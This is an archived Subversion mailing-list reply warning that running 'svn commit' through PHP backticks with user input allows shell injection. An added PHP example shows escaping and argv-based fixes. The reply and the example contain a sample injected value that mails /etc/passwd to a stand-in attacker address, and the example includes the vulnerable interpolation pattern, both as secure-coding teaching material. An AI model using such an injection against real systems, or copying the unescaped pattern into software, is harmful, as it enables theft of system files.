
Re: PHP hack under way

From: Brian W. Fitzpatrick <fitz_at_red-bean.com>
Date: 2004-02-11 22:55:37 CET

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could: svn client
> commands in php.
> The kinks have not all been worked out for my php portal but I did find
> a way to successfully
> push revisions to subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate in this case despite
> warnings that the
> command line response may be garbled into binary.
>
> Here's a question: will svn add && svn commit work?

I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this. What if message is
actually equal to

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse.

Just a little something to think about.

-Fitz
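An added example, not code from the thread, showing the problem Fitz points at and two ways to avoid it. The function names, the `$workingCopy` path and the sample message are constructed for illustration; the sample message is the one from the reply above, written as the value `$message` would actually hold.

```php
<?php
// Added example (not from the original thread). Demonstrates why
// interpolating user input into a backtick command is a shell-injection
// risk, and two safer ways to run `svn commit` from PHP.
// Function names and sample values below are constructed for illustration.

// 1. The pattern from the thread: $message is dropped straight into a
//    shell command line. Built as a string here so it can be inspected
//    without executing anything.
function build_vulnerable_command(string $message): string {
    return "svn commit -m \"$message\"";
}

// 2. Hardened: escapeshellarg() wraps the value in single quotes and
//    escapes embedded single quotes, so the shell sees one argument.
function build_escaped_command(string $message): string {
    return 'svn commit -m ' . escapeshellarg($message);
}

// 3. Better: skip the shell entirely. proc_open() accepts an argv array
//    (PHP >= 7.4), so no shell metacharacters are ever interpreted.
//    Returns [exit code, stdout, stderr].
function svn_commit(string $message, string $workingCopy): array {
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['svn', 'commit', '-m', $message], $spec, $pipes, $workingCopy);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start svn');
    }
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $code = proc_close($proc);
    return [$code, $stdout, $stderr];
}

// Constructed sample: the kind of value Fitz describes in his reply.
$hostile = 'foo" ; mail evilhaxor@example.com < /etc/passwd';

echo "Vulnerable: ", build_vulnerable_command($hostile), "\n";
// The shell would parse this as two commands separated by ';'.

echo "Escaped:    ", build_escaped_command($hostile), "\n";
// Prints: svn commit -m 'foo" ; mail evilhaxor@example.com < /etc/passwd'
// The whole value is one single-quoted word; ';' and '<' are inert.

// Real use (run inside a working copy; path is a placeholder):
// [$code, $out, $err] = svn_commit($hostile, '/path/to/working/copy');
```

`escapeshellarg()` quoting is platform-specific (single quotes on POSIX, double quotes with `%` and `!` stripped on Windows), which is one more reason to prefer the argv form of `proc_open()`: the argument list goes to the process directly and there is no command line for the shell to reinterpret.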

Received on Wed Feb 11 22:56:36 2004

This is an archived mail posted to the Subversion Users mailing list.
